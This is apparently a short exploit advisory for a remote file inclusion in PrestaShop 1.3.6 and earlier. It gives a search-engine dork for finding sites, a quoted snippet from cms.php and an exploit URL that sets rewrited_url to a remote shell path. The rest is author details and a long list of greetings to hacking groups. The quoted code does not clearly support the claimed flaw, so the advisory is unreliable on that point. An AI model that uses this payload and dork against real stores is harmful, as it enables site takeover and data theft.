### # Title : PrestaShop <=1.3.6 (cms.php) Remote File Inclusion # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : php # Impact : Remote File Inclusion # Tested on : Windows XP sp3 FR ### # Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) ## # [»] ~ special thanks to : Dr.Ride ### # Go0gle DOrk : "Powered by PrestaShop™ " # Vulnerability Code in cms.php : ... /* rewrited url set */ $rewrited_url = $link->getCmsLink($cms, $cms->link_rewrite); include(dirname(__FILE__).'/header.php'); $smarty->assign(array( 'cms' => $cms, 'content_only' => intval(Tools::getValue('content_only')) )); ... # Exploit : http://[localhost]/[path]/cms.php?rewrited_url=http://[Shell-Path] ================================================================================================= #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # 1337day.com * www.packetstormsecurity.org * exploit-db.com * bugsearch.net * exploit-id.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... #================================================================================================